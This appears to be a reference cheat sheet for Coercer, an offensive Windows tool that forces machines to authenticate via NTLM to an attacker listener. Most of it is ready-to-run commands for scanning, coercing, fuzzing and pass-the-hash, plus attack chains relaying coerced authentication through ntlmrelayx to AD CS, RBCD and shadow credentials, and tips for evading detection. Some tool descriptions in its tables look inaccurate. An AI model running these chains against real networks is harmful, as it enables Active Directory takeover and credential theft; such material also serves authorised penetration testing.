Coercer
Coercer is a Python tool that automates Windows authentication coercion attacks by triggering NTLM authentication from target machines to an attacker-controlled listener. It supports multiple coercion methods including PetitPotam, PrinterBug, DFSCoerce, and ShadowCoerce, enabling NTLM relay attacks for AD privilege escalation.
Installation
섹션 제목: “Installation”Via pip
섹션 제목: “Via pip”pip install coercerFrom GitHub
섹션 제목: “From GitHub”git clone https://github.com/p0dalirius/Coercer.git
cd Coercer
pip install -r requirements.txt
python3 -m coercer --helpRequirements
섹션 제목: “Requirements”- Python 3.8+
- impacket
- pycryptodomex
- requests
- argparse
Quick Start
섹션 제목: “Quick Start”Basic coercion with credentials:
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAINScan target to identify working methods:
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAINCoerce with NTLM hash:
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c -d DOMAINCoercion Methods
섹션 제목: “Coercion Methods”Coercer supports numerous coercion methods across different MS-RPC protocols and Windows services:
| Method | Service | Protocol | MS-RPC Interface | Impact |
|---|---|---|---|---|
| PetitPotam | EfsRpc | \\pipe\efsrpc | EfsRpc | High - SYSTEM auth |
| PrinterBug | Spooler | \\pipe\spoolss | Printer (RPC) | High - SYSTEM auth |
| DFSCoerce | MSDFS | \\pipe\netdfs | NetDFS | Medium - SYSTEM auth |
| ShadowCoerce | Shadow Copy VSS | \\pipe\vssadmin | FSRVP | Medium - SYSTEM auth |
| MSEFSRCoerce | EFSRPC | \\pipe\efsrpc | EfsRpc | High - SYSTEM auth |
| Webexec | WebClient | HTTP | IOCTL | Medium - User context |
| DFSCoerceRPC | MSDFS | \\pipe\netdfs | NetDFS | Medium - SYSTEM auth |
| RprRemoteFindFirstFile | RemoteRegistry | \\pipe\winreg | RemoteRegistry | Low - Registry read |
| EfsRpcOpenFileRaw | EfsRpc | \\pipe\efsrpc | EfsRpc | High - SYSTEM auth |
| Lsasrv | LSA | \\pipe\lsarpc | LSA | Medium - LSASS auth |
| Tssession | Terminal Services | \\pipe\tssession | TermSrv | Low - TS context |
Scan Mode
섹션 제목: “Scan Mode”Enumerate which coercion methods work without triggering full authentication:
# Scan all methods
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
# Scan with NTLM hash
coercer scan -t 192.168.1.50 -u domain\\user -H HASH -d DOMAIN
# Filter by method name
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-method PetitPotam
# Filter by protocol
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-protocol EfsRpc
# Filter by pipe name
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-pipe-name efsrpc
# Scan with timeout per method
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --timeout 10Coerce Mode
섹션 제목: “Coerce Mode”Trigger actual NTLM authentication to listener:
# Basic coercion to listener
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
# Coerce specific method
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --method PetitPotam
# Coerce with output verbosity
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -v
# Coerce to alternative port
coercer coerce -l 192.168.1.100:4444 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
# Coerce with timeout
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --timeout 30Fuzz Mode
섹션 제목: “Fuzz Mode”Discover new coercion methods by fuzzing RPC endpoints:
# Fuzz target to discover methods
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100
# Fuzz with specific pipe
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100 --pipe efsrpc
# Fuzz with timeout
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100 --timeout 30Authentication Options
섹션 제목: “Authentication Options”Username/Password Authentication
섹션 제목: “Username/Password Authentication”coercer coerce -l LISTENER -t TARGET -u domain\\username -p password -d DOMAIN
coercer coerce -l LISTENER -t TARGET -u username -p password -d DOMAINNTLM Hash Authentication (Pass-the-Hash)
섹션 제목: “NTLM Hash Authentication (Pass-the-Hash)”coercer coerce -l LISTENER -t TARGET -u domain\\username -H LM:NTLM -d DOMAIN
coercer coerce -l LISTENER -t TARGET -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586cKerberos Authentication
섹션 제목: “Kerberos Authentication”coercer coerce -l LISTENER -t TARGET -k -d DOMAIN
export KRB5CCNAME=/tmp/user.ccache
coercer coerce -l LISTENER -t TARGET -kNo Authentication
섹션 제목: “No Authentication”coercer coerce -l LISTENER -t TARGET --no-pass
coercer scan -t TARGET --no-passLocal Authentication
섹션 제목: “Local Authentication”coercer coerce -l LISTENER -t TARGET --localListener Setup
섹션 제목: “Listener Setup”Using ntlmrelayx (SMB Relay)
섹션 제목: “Using ntlmrelayx (SMB Relay)”# Terminal 1: Start ntlmrelayx
ntlmrelayx.py -t 192.168.1.60 --no-http-server -smb2support
# Terminal 2: Run coercer
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAINUsing Responder (LLMNR/NBT-NS)
섹션 제목: “Using Responder (LLMNR/NBT-NS)”# Terminal 1: Start Responder
responder -I eth0 -v
# Terminal 2: Run coercer with SMB relay
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAINCustom SMB Server Listener
섹션 제목: “Custom SMB Server Listener”# Using impacket smbserver
smbserver.py -smb2support -ip 192.168.1.100 share /tmp
# Run coercer to relay
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAINListening on Specific Port
섹션 제목: “Listening on Specific Port”coercer coerce -l 192.168.1.100:445 -t TARGET -u domain\\user -p password -d DOMAINCommon Attack Chains
섹션 제목: “Common Attack Chains”Coerce to ntlmrelayx → AD CS ESC8
섹션 제목: “Coerce to ntlmrelayx → AD CS ESC8”# Terminal 1: Start ntlmrelayx targeting ADCS
ntlmrelayx.py -t http://dc.domain.local/certsrv/certfnsh.asp -template DomainController --no-http-server -smb2support
# Terminal 2: Coerce to relay
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAINCoerce to ntlmrelayx → LDAP for RBCD
섹션 제목: “Coerce to ntlmrelayx → LDAP for RBCD”# Terminal 1: Start ntlmrelayx for LDAP relay with RBCD
ntlmrelayx.py -t ldap://dc.domain.local --no-http-server -smb2support --delegate-access
# Terminal 2: Coerce target
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAINCoerce to Relay for Shadow Credentials
섹션 제목: “Coerce to Relay for Shadow Credentials”# Terminal 1: Start ntlmrelayx targeting LDAP
ntlmrelayx.py -t ldap://dc.domain.local --no-http-server -smb2support --shadow-credentials
# Terminal 2: Trigger coercion
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAINCoerce Machine Account to Relay for Privilege Escalation
섹션 제목: “Coerce Machine Account to Relay for Privilege Escalation”# Scan first to find working method
coercer scan -t DC_IP -u domain\\user -p password -d DOMAIN
# Coerce DC to listener for relay to ADCS
coercer coerce -l ATTACKER_IP -t DC_IP -u domain\\user -p password -d DOMAIN --method PetitPotamWebDAV Coercion
섹션 제목: “WebDAV Coercion”Force HTTP authentication instead of SMB for cross-protocol relay attacks:
# Enable WebDAV coercion (requires WebClient service running)
coercer coerce -l http://ATTACKER_IP:80 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
# WebDAV with custom path
coercer coerce -l http://ATTACKER_IP:8080/share -t TARGET -u domain\\user -p password -d DOMAIN
# Combine with HTTP listener on ntlmrelayx
ntlmrelayx.py -I http://ATTACKER_IP:8080 -t http://target.com --no-smb-server
coercer coerce -l http://ATTACKER_IP:8080 -t TARGET -u domain\\user -p password -d DOMAINFiltering Options
섹션 제목: “Filtering Options”Filter by Method Name
섹션 제목: “Filter by Method Name”# Only PetitPotam
coercer scan -t TARGET -u domain\\user -p password --filter-method PetitPotam
# Multiple methods
coercer scan -t TARGET -u domain\\user -p password --filter-method "PetitPotam|PrinterBug"Filter by Protocol Name
섹션 제목: “Filter by Protocol Name”# Only EfsRpc protocol
coercer scan -t TARGET -u domain\\user -p password --filter-protocol EfsRpc
# Multiple protocols
coercer scan -t TARGET -u domain\\user -p password --filter-protocol "EfsRpc|NetDFS"Filter by Pipe Name
섹션 제목: “Filter by Pipe Name”# Only efsrpc pipe
coercer scan -t TARGET -u domain\\user -p password --filter-pipe-name efsrpc
# Multiple pipes
coercer scan -t TARGET -u domain\\user -p password --filter-pipe-name "efsrpc|netdfs"Combine Filters
섹션 제목: “Combine Filters”coercer scan -t TARGET -u domain\\user -p password -d DOMAIN \
--filter-method PetitPotam \
--filter-protocol EfsRpcTroubleshooting
섹션 제목: “Troubleshooting”Target Unreachable
섹션 제목: “Target Unreachable”# Verify connectivity
ping TARGET_IP
# Test SMB connectivity
smbclient -L //TARGET_IP -u domain\\user -p password
# Test with timeout
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN --timeout 30Authentication Failed
섹션 제목: “Authentication Failed”# Verify credentials
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v
# Try alternative username format
coercer scan -t TARGET -u DOMAIN\\user -p password -d DOMAIN
# Use NTLM hash instead
coercer scan -t TARGET -u domain\\user -H HASH -d DOMAINService Not Available
섹션 제목: “Service Not Available”# Some methods require specific services running
# Check if MSDFS, Spooler, or EfsRpc services are active
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v
# Try with timeout increase
coercer coerce -l LISTENER -t TARGET -u domain\\user -p password -d DOMAIN --timeout 60No Working Methods Found
섹션 제목: “No Working Methods Found”# Method may be patched or disabled
# Try scanning with verbose output
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v
# Enumerate installed hotfixes
wmic qfe list brief /format:listListener Connection Issues
섹션 제목: “Listener Connection Issues”# Verify listener is running and accessible
telnet LISTENER_IP 445
# Check firewall rules
sudo ufw allow 445/tcp
# Use verbose logging
coercer coerce -l LISTENER_IP -t TARGET -u domain\\user -p password -d DOMAIN -vBest Practices
섹션 제목: “Best Practices”- Always Scan First: Use
coercescan to identify working methods before triggering full coercion - Use Specific Methods: Target known-working methods to avoid noise and detection
- Filter Results: Leverage filtering to reduce network activity and operational footprint
- Combine with Relay: Pair Coercer with ntlmrelayx or Responder for effective privilege escalation
- Monitor Logs: Coercion attempts generate security event logs; operate during high activity periods
- Patch Management: Target systems with outdated patches are more likely to support multiple methods
- Service Enumeration: Verify target services (Spooler, EfsRpc, MSDFS) are running before coercion
- Credential Handling: Use NTLM hashes or Kerberos tickets to avoid passing plaintext credentials
- Clean Relay Chains: Ensure ntlmrelayx or relay tool is properly configured before coercing
- Documentation: Log all coercion attempts, timing, and results for post-exploitation analysis
Related Tools
섹션 제목: “Related Tools”| Tool | Purpose |
|---|---|
| PetitPotam | Standalone EfsRpc coercion tool; foundation for Coercer |
| ntlmrelayx | NTLM relay framework to authenticate against other services |
| Responder | LLMNR/NBT-NS poisoning and relay tool |
| Certipy | Active Directory Certificate Services enumeration and exploitation |
| krbrelayx | Kerberos relay attacks and alternative authentication methods |
| SpoolSample | Standalone PrinterBug implementation |
| PrintNightmare | RCE exploit for CVE-2021-1675 via Print Spooler |
| Shadow Credentials | Credential dumping via shadow credentials in Active Directory |